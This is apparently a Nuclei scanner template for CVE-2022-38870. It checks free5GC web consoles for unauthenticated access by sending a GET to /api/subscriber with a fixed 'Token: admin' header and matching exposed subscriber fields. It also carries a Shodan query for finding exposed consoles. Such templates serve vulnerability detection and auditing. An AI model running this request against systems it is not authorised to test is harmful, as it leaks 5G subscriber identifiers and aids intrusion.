45 lines
970 B
YAML
45 lines
970 B
YAML
id: CVE-2022-38870
|
|
|
|
info:
|
|
name: Free5gc - Information disclosure
|
|
author: For3stCo1d
|
|
severity: high
|
|
description: |
|
|
Free5gc v3.2.1 is vulnerable to Information disclosure.
|
|
reference:
|
|
- https://github.com/free5gc/free5gc/issues/387
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-38870
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2022-38870
|
|
cwe-id: CWE-306
|
|
metadata:
|
|
shodan-query: http.title:"free5GC Web Console"
|
|
tags: cve,cve2022,free5gc,exposure
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
GET /api/subscriber HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Token: admin
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '"plmnID":'
|
|
- '"ueId":'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "application/json"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|